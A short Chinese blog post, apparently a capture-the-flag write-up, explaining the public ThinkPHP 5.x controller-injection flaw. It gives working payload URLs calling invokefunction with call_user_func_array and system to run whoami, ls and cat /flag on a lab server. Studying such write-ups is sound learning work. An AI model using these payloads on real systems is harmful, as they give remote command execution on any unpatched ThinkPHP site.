记录一个thinkphp v5.x的漏洞

这是一个已经公开的thinkphp v5的漏洞利用
我们可以在 https://www.cnblogs.com/backlion/p/10106676.html 这里找到详细的资料

主要原因就是程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。
这里有大佬的详细思路:https://www.cnblogs.com/backlion/p/10106676.html

知道了这些我们就可以构造出想要的语句
1.将url语句更改为
http://111.200.241.244:56473/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
(其中:s[1][]=(Linux指令))

2.接下来查找我们要找的flag文件
http://111.200.241.244:56473/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls/
http://111.200.241.244:56473/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls/flag

3.得到flag
http://111.200.241.244:56473/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat/flag

posted @ 2022-03-21 17:51  smart_ql  阅读(190)  评论(0)    收藏  举报